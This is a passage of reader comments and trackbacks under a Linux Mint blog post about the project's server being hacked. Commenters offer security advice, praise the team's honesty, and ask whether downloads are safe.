    About detectors: They ONLY detect what is known… not private invading tools… nor the ones that succeeded in not being detected… Usually useful they are not if the target is an important one where other tools are used. The best ones are those that nobody notices.

    The KNOWN detected problem MUST not be assumed as a first… but just one that was detected because it was primitive. The situation with Firefox in the repository may be evidence that what was found was in fact not a first but just the last. We have to assume the worst and take actions to avoid repetition…

    That demands a change in the usual working methods.
    Security is a process not a tool… as good as the tool may be and in this case to be linux. It is the overall process and architecture of the system that must be changed… NO CONNECTION should exist between the server and the base working copy that will feed it. The only connection should be made JUST by intermediary media… NEVER by direct wire connection… And the media should be cleaned by a third machine booting from CD.

    Is this secure? As a model yes… but it depends on the sanity of the sources… so there's never 100% certainty… just a better confidence.

    Sorry to bring bad news… but things are as they are:
    When you are connected without a rubber you may always get a bad surprise… or be ignorant of the bad news if the invasion is a very good one and not widely available to be known and detected.

    I believe I’ve erased any mis-perceptions except one:
    - I’m not stating this is the actual scenario… Just that is a possibility we are unable to evaluate… and thus have to take in account.

    That said, compliments to everyone, and please consider the choices carefully. A good architecture for a system is a lot of work… but it’s made only once and that is not only a safe methodology… it is efficient over time as a copy is easier and faster than fighting to correct what may be found … not to mention missing what is not found.

    Cheers.
    DuLac.

  84. Stretchr Says:

    What is VERY acceptable is the way that you handled the problem and the honesty with which you addressed and informed the community. I’m afraid that we are so used to being hoodwinked, we do a double-take when a company actually admits a mistake and takes responsibility. In my book, that moves Mint way up on my confidence list. Thanks for surprising me!

    Cheers,
    Stretchr

  85. John Says:

    Hmmm, lots of people talking about the honesty of you guys. It may have been said bunches of times already, but I gotta say it too.

    THANK YOU for being so up front and honest. The honesty just blows me away. Mint is awesome.

  86. reload Says:

    Hey guys!

    Ironically, I was downloading Linux Mint last night for the first time to try out a different distro. Are the ISOs okay to download? Thanks for all of the hard work getting things resolved! I’m sure you guys have regular day jobs as well. I’m assuming OSX is pretty much in the clear from the trojan? Anything I should check to make sure I’m not infected? I was running Leopard. Thanks again and I look forward to using your software.

  87. RMellis Says:

    damn virus. >:(

    ah well its gone :P

  88. W.T Says:

    Damn. I hope there is no backdoor C code in the distribution too. Btw, you could try this site monitoring service that is specific to malware/trojans: http://hackalert.armorize.com

    Trial account supports daily scan up to 2 URLs and provides email notification.

  89. Nick Says:

    Like everyone’s said, thanks for the honesty. It takes balls to admit that you’ve got a problem or flaw. Or, the site for that matter. Now, if you could just get Microsoft included…

    Either way, you guys have it fixed, and that’s what’s important. Microsoft doesn’t like to be included in that either… hmmm. Oh well.

    Keep up the good work that’s been going into Mint. It’s been fun rooting for you guys. I’ve gotten nearly 10 “Computer Illiterate” people to dual-boot XP and Mint. All of them report that they use Mint all the time. They only use XP to play a certain game, or piece of software. For the average user, they just want to be able to use the net, check email, use Office tools, calculator, etc. Another great thing is the safety of Linux.

    Mint does all of this flawlessly. I hope to become a better programmer one day, and possibly help the Mint Community.

  90. saluztre Says:

    …am just a surfing hardy user newbie, looking around, this is one of my lucky days. finding linuxmint!

  91. Keval Says:

    Hi there,

    I am a very enthu distro experimentalist.. I am a hobby hacker as well.. I understand, even if the code is secure the server sides like IIS or apache can still be exploited… Injection is a very common thing… besides no need to panic ppl, trojans are not for linux and I salute the honesty of Clem.. Good Job… Keep Rockin’

  92. Windreaver Says:

    There is a linux version of Avast anti-virus you can install. Works super great.

    http://www.avast.com


Trackbacks & Pingbacks

  1. The Linux Mint Blog » Blog Archive » Weekly Newsletter - Issue 58 Says:

    [...] server was hacked with downtime as a consequence. This was by a “bot” that scanned the net for [...]

  2. RedHat/Fedora get totally "pwned" - Open Source - TechEnclave Says:

    [...] permalink Yeah saw that ! Even Linux Mint servers were hacked The Linux Mint Blog Blog Archive Server hacked [...]

  3. Compromesso anche il server di Linux Mint | PettiNix Says:

    [...] in addition to the Fedora and Red Hat servers, the Linux Mint server has also been compromised. Announced on the distribution's official blog, the server suffered an injection of malicious code to [...]

  4. The Linux Mint Blog » Blog Archive » Server hacked (again) Says:

    [...] We’ve been hit again by this: http://www.linuxmint.com/blog/?p=235 [...]

  5. Linux Mint web site hacked! « UNIX Administratosphere Says:

    [...] that such things occur, but occur they do (what with human nature being what it is). They announced the hack on their blog. I wish the Linux Mint folks the best in their recovery. No one deserves to [...]